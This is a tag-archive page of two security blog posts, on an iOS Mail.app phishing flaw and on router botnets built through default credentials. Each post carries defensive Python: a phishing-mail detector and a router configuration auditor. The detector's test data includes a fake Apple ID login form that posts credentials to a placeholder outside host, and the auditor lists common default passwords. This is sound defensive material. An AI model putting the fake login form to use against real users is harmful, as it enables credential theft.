Tag Archives: hijacking

Flaw in Mail.app Can Be Used to Hijack iCloud Password

The flaw lies in Mail.app, Apple's default e-mail program for iOS. According to security researcher Jan Sourcek, “this bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS.” To reduce suspicion, the code even uses cookies to detect whether someone has already visited the page in the past; if so, it stops displaying the password prompt.

This means that hackers could easily create phishing mails showing a form that looks exactly like the familiar iCloud login pop-up window. The user would be asked for their username and password, which – once entered – would then be transmitted to the cybercriminals. Just take a look at the proof-of-concept video below to see how easy it would be to trick an unsuspecting user!

Sourcek discovered the flaw in January 2015 and informed Apple immediately. Since then, no action has been taken to fix the vulnerability. In the hope that it will make Apple take the bug more seriously, the researcher has now published his findings together with a proof-of-concept video and the corresponding code.
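The defensive counterpart to the technique described above is a mail filter that notices when an HTML message carries a login form at all: a legitimate notification never asks for a password inline. The following is an added illustration, not code from the Avira post or from the researcher's proof of concept. It uses only the Python standard library, assumes the mail pipeline hands it the raw message bytes, and works on a constructed sample whose form posts to a placeholder domain.

```python
"""Flag HTML e-mails that carry a credential-harvesting form.

Added illustration (not from the original post). Heuristic: an HTML part
that contains a password input AND a form posting to an absolute http(s)
URL is treated as suspicious.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormInspector(HTMLParser):
    """Collect password inputs and form targets from one HTML body."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and attrs.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(attrs.get("action", ""))


def inspect_html(html_body: str) -> dict:
    """Return the indicators found in a single HTML body."""
    parser = _FormInspector()
    parser.feed(html_body)
    external = [a for a in parser.form_actions
                if urlparse(a).scheme in ("http", "https")]
    return {
        "password_inputs": parser.password_inputs,
        "external_form_actions": external,
        "suspicious": parser.password_inputs > 0 and bool(external),
    }


def inspect_message(raw: bytes) -> dict:
    """Parse a raw RFC 5322 message and inspect every text/html part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    verdict = {"password_inputs": 0, "external_form_actions": [], "suspicious": False}
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        result = inspect_html(part.get_content())
        verdict["password_inputs"] += result["password_inputs"]
        verdict["external_form_actions"] += result["external_form_actions"]
        verdict["suspicious"] = verdict["suspicious"] or result["suspicious"]
    return verdict


# Constructed sample: an HTML body that imitates a login prompt and posts the
# credentials to an outside host (".invalid" placeholder, not a real site).
SAMPLE_PHISH = b"""\
From: noreply@example.net
To: victim@example.org
Subject: Account notice
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<form action="https://collector.invalid/submit" method="post">
Apple ID <input name="user"><br>
Password <input type="password" name="pw"><br>
<input type="submit" value="Sign In">
</form>
</body></html>
"""

# Constructed sample: an ordinary HTML newsletter with no form at all.
SAMPLE_BENIGN = b"""\
From: newsletter@example.net
To: reader@example.org
Subject: Weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Hello, here is this week's news.</p></body></html>
"""

if __name__ == "__main__":
    print("phish  :", inspect_message(SAMPLE_PHISH))
    print("benign :", inspect_message(SAMPLE_BENIGN))
```

The check runs on the HTML the client would render, so it does not matter whether the form was in the original message or pulled in as remote content afterwards; a gateway that fetches remote parts before filtering gets the same verdict either way. A form with a relative `action` is deliberately not flagged, since inside an e-mail it has no origin to post to.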

Feel free to follow this link in order to find out more about the issue.

The post Flaw in Mail.app Can Be Used to Hijack iCloud Password appeared first on Avira Blog.

Mass-Scale Abuse of Routers Due to Lax Security

Why can botnets like this even exist? According to a study by Incapsula it is simple negligence – by ISPs, vendors and users alike.

The attacks were first spotted last year in December and appear to have been ongoing ever since. More than 40,000 infected routers from 1,600 ISPs all over the world have been documented. When not being used to execute DDoS (distributed denial of service) attacks, the routers do something rather scary: in their idle time they use their resources to scan for additional routers to recruit!

“Our analysis reveals that miscreants are using their botnet resources to scan for additional routers to add to their “flock.” They do so by executing shell scripts, searching for devices having open SSH ports which can be accessed using default credentials.

Facilitating the infiltration, all of these under-secured routers are clustered in the IP neighborhoods of specific ISPs, which provide them in bulk to end users. For perpetrators, this is like shooting fish in a barrel, which makes each of the scans that much more effective. Using this botnet also enables perpetrators to execute distributed scans, improving their chances against commonplace blacklisting, rate-limiting and reputation-based defense mechanisms”, the study says.

The researchers believe that the routers were not hacked by means of vulnerabilities in the firmware but were hijacked due to other issues: all units are remotely accessible via HTTP and SSH on their default ports and nearly all of them are configured with vendor-provided default login credentials.

This combination invites trouble, and DDoS attacks are only one of the possible threats resulting from it. Attackers could just as well:

  • eavesdrop on all communication.
  • perform man-in-the-middle (MITM) attacks (e.g., DNS poisoning).
  • hijack cookies.
  • gain access to local network devices (e.g., CCTV cameras).

What can you do?

Make sure to always change the default login credentials – something every router owner should do from the start. You should also think twice before enabling remote access to your router's management interface.
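The two pieces of advice above map directly onto the two conditions the study found on nearly every hijacked unit: factory credentials and management services reachable from the WAN on their default ports. The following audit script is an added example, not code from the Avira post or from Incapsula's study. The configuration layout (a flat dict with `admin_user`, `admin_password` and one sub-dict per service) is an assumption made for illustration; real firmware exports differ, so the `audit` function is what you would adapt, and the two constructed configurations show a weak unit beside the same unit after the advice has been applied.

```python
"""Audit a home-router configuration for the two weaknesses the study
describes: unchanged factory credentials and management exposed to the WAN.

Added example (not from the original post). The config schema is assumed
for illustration.
"""
from dataclasses import dataclass
from typing import List

# Widely published factory defaults; any of these counts as "unchanged".
COMMON_DEFAULT_PASSWORDS = {"", "admin", "password", "1234", "12345"}
DEFAULT_PORTS = {"http": 80, "https": 443, "ssh": 22}


@dataclass
class Finding:
    severity: str   # "high" or "medium"
    message: str


def audit(cfg: dict) -> List[Finding]:
    """Return the findings for one configuration dict (empty list = clean)."""
    findings = []
    user = cfg.get("admin_user", "")
    pw = cfg.get("admin_password", "")

    # Factory credentials: the study found nearly all hijacked units still used them.
    if pw in COMMON_DEFAULT_PASSWORDS or pw.lower() == user.lower():
        findings.append(Finding("high", "administrator password is a vendor default or equals the username"))
    elif len(pw) < 12:
        findings.append(Finding("medium", "administrator password is shorter than 12 characters"))

    # Remote management: any service answering on the WAN side is a problem;
    # on its default port it is exactly what the botnet's scans look for first.
    for svc in ("http", "https", "ssh"):
        s = cfg.get(svc, {})
        if not s.get("enabled", False) or not s.get("wan_access", False):
            continue
        port = s.get("port", DEFAULT_PORTS[svc])
        where = "its default port" if port == DEFAULT_PORTS[svc] else f"port {port}"
        findings.append(Finding("high", f"{svc} management reachable from the WAN on {where}"))
    return findings


def is_acceptable(cfg: dict) -> bool:
    """True when the configuration has no high-severity finding."""
    return not any(f.severity == "high" for f in audit(cfg))


# Constructed sample: the kind of unit the study counted.
WEAK_CONFIG = {
    "admin_user": "admin",
    "admin_password": "admin",
    "http": {"enabled": True, "wan_access": True, "port": 80},
    "ssh": {"enabled": True, "wan_access": True, "port": 22},
}

# The same unit after following the advice above: new credentials,
# management reachable only from the LAN, SSH switched off.
HARDENED_CONFIG = {
    "admin_user": "owner",
    "admin_password": "CHANGE-ME-to-a-long-unique-passphrase",  # placeholder
    "https": {"enabled": True, "wan_access": False, "port": 443},
    "ssh": {"enabled": False},
}

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "->", "acceptable" if is_acceptable(cfg) else "NOT acceptable")
        for f in audit(cfg):
            print(f"  [{f.severity}] {f.message}")
```

Moving a management service to a non-default port is reported at the same severity as leaving it on the default one: it only slows down the scans the study describes, it does not close the door. Disabling WAN access altogether is the condition that clears the finding.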

The post Mass-Scale Abuse of Routers Due to Lax Security appeared first on Avira Blog.